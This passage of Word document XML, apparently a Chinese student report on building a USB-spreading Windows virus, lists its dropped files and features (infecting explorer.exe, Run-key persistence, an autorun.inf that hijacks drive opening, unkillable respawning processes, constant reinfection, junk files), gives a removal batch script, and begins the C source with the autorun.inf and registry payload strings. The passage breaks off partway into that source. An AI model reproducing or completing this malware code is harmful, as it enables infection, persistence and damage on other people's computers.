        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>c:\windows\explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>c:\windows\system32\dllcache\explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>c:\windows\system\msmouse.dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>c:\windows\system32\cmdsys.sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRPr="00D2145F" w:rsidRDefault="009F2751" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>c:\windows\system32\mstsc32.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009F2751"/>
    <w:p w:rsidR="009F2751" w:rsidRPr="00A90D84" w:rsidRDefault="009F2751" w:rsidP="009F2751">
      <w:r>
        <w:t>3、病毒体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C:\Windows\explorer.exe感染原explorer.exe文件，使其不需要修改注册表实现开机启动，并且可以在explorer</w:t>
      </w:r>
      <w:r>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动之前启动。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRPr="00A90D84" w:rsidRDefault="009F2751" w:rsidP="009F2751">
      <w:r w:rsidRPr="00A90D84">
        <w:t>4.修改注册表，在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90D84">
        <w:br/>
        <w:t>设置自启动项（此操作不使用windowsAPI,防止用户对病毒体的发现，并实现并行执行）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90D84">
        <w:br/>
        <w:t>5.生成的autorun.inf改变磁盘的打开方式，使其在windows2000以上的系统无论选择“打开”、“双击”、“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D45FD" w:rsidRDefault="009F2751" w:rsidP="007A5E5A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A90D84">
        <w:t>资源管理器”等方式都无法打开分驱，而是以运行病毒的方式取而代之。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90D84">
        <w:br/>
        <w:t>6.连锁能力，将病毒体相连，实现相连复制更新</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90D84">
        <w:br/>
        <w:t>7.使用进程不断调用进程，使得在任务管理里无法结束病毒进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90D84">
        <w:br/>
        <w:t>8.不断搜索磁盘，只要发现未感染病毒的一律感染，病毒删除后1秒内再建</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90D84">
        <w:br/>
        <w:t>9.生成垃圾文件（DESTORY_感染_任意数字）5个于C盘下</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90D84">
        <w:br/>
        <w:t>10.附带删除文件函数（为防止危害，本函数默认不执行）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="007D45FD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>提供病毒卸载程序（保存为X.BAT，双击运行即可卸载）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009034D5" w:rsidRDefault="009034D5" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:sectPr w:rsidR="009034D5" w:rsidSect="00693575">
          <w:type w:val="continuous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:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>@echo off</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>taskkill /im mstsc32.exe /f</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del c:\windows\wjview32.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del c:\windows\explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del c:\windows\system32\dllcache\explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del c:\windows\system\msmouse.dll</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del c:\windows\system32\cmdsys.sys</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del c:\windows\system32\mstsc32.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del c:\svchost.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del c:\autorun.inf</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del d:\svchost.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del d:\autorun.inf</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del e:\svchost.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del e:\autorun.inf</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>del f:\svchost.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del f:\autorun.inf</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del g:\svchost.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del g:\autorun.inf</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del h:\svchost.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del h:\autorun.inf</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>copy c:\windows\system\explorer.exe c:\windows\explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>copy c:\windows\system\explorer.exe c:\windows\system32\dllcache\explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>del c:\windows\system\explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>echo FINISH!</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pause</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009034D5" w:rsidRDefault="009034D5" w:rsidP="009F2751">
      <w:pPr>
        <w:sectPr w:rsidR="009034D5" w:rsidSect="009034D5">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="991" w:bottom="1440" w:left="993" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:num="2" w:sep="1" w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009F2751"/>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009F2751">
      <w:r>
        <w:t>实现上述功能的病毒源代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * svchost.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> *  Created on: 2014</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> *      Author: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ismdeep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>&lt;stdio.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>标准输入输出</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;string.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>字符串操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;stdlib.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>其它函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;process.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>进程控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>&lt;dir.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>目录函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>#define</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SVCHOST_NUM 6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>关键位置病毒复制数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>#define</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RUBBISH_NUM 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>垃圾文件数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009034D5">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>#define</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> REMOVE_NUM   5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>删除文件数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3F7F5F"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64130" w:rsidRDefault="00A64130" w:rsidP="009F2751"/>
    <w:p w:rsidR="00A64130" w:rsidRDefault="00A64130" w:rsidP="00C625D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> autorun.inf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00312869">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00312869">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:t>AUTORUN.INF</w:t>
      </w:r>
      <w:r>
        <w:t>内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00312869">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 1.</w:t>
      </w:r>
      <w:r>
        <w:t>自动运行</w:t>
      </w:r>
      <w:r>
        <w:t>SVCHOST.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00312869">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 2.</w:t>
      </w:r>
      <w:r>
        <w:t>覆盖默认打开命令，使用病毒体作为新的打开方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00312869">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 3.</w:t>
      </w:r>
      <w:r>
        <w:t>覆盖默认资源管理器命令，使病毒体作为新的命令方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00312869">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00312869">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *autorun =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00312869">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00312869">
      <w:pPr>
        <w:pStyle w:val="source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"[AutoRun]\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nopen</w:t>
      </w:r>
      <w:r>
        <w:t>=\"SVCHOST.com /s\"\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nshell</w:t>
      </w:r>
      <w:r>
        <w:t>\\open=</w:t>
      </w:r>
      <w:r>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:t>(&amp;O)\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nshell</w:t>
      </w:r>
      <w:r>
        <w:t>\\open\\Command=\"SVCHOST.com /s\"\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nshell</w:t>
      </w:r>
      <w:r>
        <w:t>\\explore=</w:t>
      </w:r>
      <w:r>
        <w:t>资源管理器</w:t>
      </w:r>
      <w:r>
        <w:t>(&amp;X)\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nshell</w:t>
      </w:r>
      <w:r>
        <w:t>\\explore\\Command=\"SVCHOST.com /s\""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C625D0" w:rsidRDefault="00B05E77" w:rsidP="00C625D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidR="00C625D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加注册表项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00203A6B">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00203A6B">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>添加注册表项：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00203A6B">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 1.</w:t>
      </w:r>
      <w:r>
        <w:t>自动运行生成病毒体</w:t>
      </w:r>
      <w:r>
        <w:t>C:\windows\wjview32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00203A6B">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00203A6B">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *regadd=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00203A6B">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>"REGEDIT4\n\n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00203A6B">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00203A6B">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"wjview32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00203A6B">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00203A6B">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>"=\"C:\\\\windows\\\\wjview32.com /s\""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C625D0" w:rsidRDefault="00B05E77" w:rsidP="00C625D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r w:rsidR="00C625D0">
        <w:t>复制文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00312869" w:rsidRDefault="00312869" w:rsidP="00312869">
      <w:pPr>
        <w:sectPr w:rsidR="00312869" w:rsidSect="00007BA0">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="849" w:bottom="1440" w:left="993" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>函数：复制文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>复制源：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>infile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
